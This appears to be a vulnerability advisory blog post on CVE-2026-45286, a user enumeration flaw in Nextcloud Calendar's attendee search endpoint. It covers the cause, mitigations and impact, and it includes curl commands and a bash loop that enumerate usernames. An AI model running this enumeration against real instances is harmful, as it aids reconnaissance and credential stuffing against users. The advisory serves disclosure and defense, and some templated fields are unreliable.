Nextcloud, Broken Access Control, CVE-2026-45286 (Medium) -DC-Jun2026-195

By /

Listen to this Post

How CVE-2026-45286 Works

This flaw resides in the Nextcloud Calendar app’s attendee suggestion endpoint. When a user starts typing a name in an event’s attendee field, the app sends an API request to fetch matching users. The backend—specifically the `Calendar` app’s API logic—then queries the Nextcloud user backend directly, ignoring global privacy controls.
First, the vulnerable versions make no distinction between a “share” and a “calendar invitation.” Administrators can restrict sharing via the “Share API” in Nextcloud’s settings, but this CVE bypasses all of those. The `Calendar` app maintains its own logic for finding users, creating a hidden attack surface.
Second, the backend uses the `searchProperties` method on the user backend. This method normally respects the “sharing restrictions” configuration. However, in the vulnerable code path, the `Calendar` app does not pass the necessary context to the user backend to enforce those restrictions. Instead, it invokes a low-level search function with permission flags that always return a list of all users matching the search term.
Third, an attacker with a valid account crafts a request to the attending suggestion endpoint—typically an OCS API endpoint like /ocs/v2.php/apps/calendar/api/v1/attendees?search=.... This is the same endpoint the web interface uses for its autocomplete feature. By iterating through letters and patterns (e.g., ?search=a, ?search=b, ?search=admin), the attacker builds a complete list of valid usernames on the instance.
Fourth, the response is an OCS-compliant XML or JSON object containing user IDs, display names, and sometimes email addresses. The amount of data returned depends on how the admin configured user attributes, but the user ID itself is always present.
Fifth, this leakage is subtle: it only reveals that a user exists on the instance, not their password or file contents. However, in security terms, a username is a valid “identifier” that lowers the complexity of a brute‑force or credential‑stuffing attack.
Finally, the root cause is a missing permission check. The fix implemented in versions 5.5.17 and 6.2.3 adds a call to the `searchForUsers` method with the correct `shareeEnumeration` and `shareeEnumerationInGroupOnly` flags. This forces the backend to respect the same “sharing restrictions” that other collaborative features already follow.

DailyCVE Form:

Platform: Nextcloud Calendar
Version: 5.5.13–5.5.16,6.2.0–6.2.2
Vulnerability : User Enumeration
Severity: Medium (CVSS 4.3)
date: 2026-06-01

Prediction: Patched 2026-06-01

What Undercode Say:

1. Identify vulnerable endpoint
curl -X GET 'https://target.nextcloud.local/ocs/v2.php/apps/calendar/api/v1/attendees?search=a' \
-H 'OCS-APIRequest: true' \
-H 'Authorization: Bearer VALID_TOKEN'
2. Basic enumeration loop
for ch in {a..z}; do
curl -s "https://target/ocs/v2.php/apps/calendar/api/v1/attendees?search=$ch" \
-H "Authorization: Bearer $TOKEN" | grep -oE '"userId":"[^"]+"' | cut -d'"' -f4
done
3. Advanced wordlist probing (JSON output)
curl -X POST 'https://target/ocs/v2.php/apps/calendar/api/v1/attendees' \
-H 'Content-Type: application/json' \
-H "Authorization: Bearer $TOKEN" \
-d '{"search":"admin"}'

How Exploit:

  1. Authenticate to the Nextcloud instance (any valid user).
  2. Intercept traffic from the “Add Attendee” autocomplete feature, observing the OCS request to /ocs/v2.php/apps/calendar/api/v1/attendees.
  3. Replay this request with a parameterized search term (?search=user).
  4. Parse the XML/JSON response; each user ID appears inside the `` or `”userId”` field.
  5. Automate using a loop with a wordlist to extract every valid account.

Protection from this CVE

  1. Immediate Upgrade – Apply patch versions 5.5.17 or 6.2.3 without delay.
  2. Workaround – Disable the Calendar app entirely until upgrade is possible.
  3. Configure `shareeEnumeration` to `false` and `shareeEnumerationInGroupOnly` to `true` (though the vulnerable endpoint ignored them).
  4. Network – Forbid internal OCS API calls from untrusted networks.
  5. Audit – Search logs for suspicious volume of `?search=` requests to /ocs/v2.php/apps/calendar/api/v1/attendees.

Impact

  • Information Disclosure – Attackers learn all valid usernames on the instance.
  • Lateral Movement – Enumerated users become targets for credential stuffing.
  • Privacy Violation – Reveals user presence in closed or sensitive groups.
  • Reconnaissance – Enables further attacks (SSRF, IDOR, etc.) requiring usernames.
  • Compliance – May violate data protection rules (GDPR, HIPAA) by exposing user identities.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top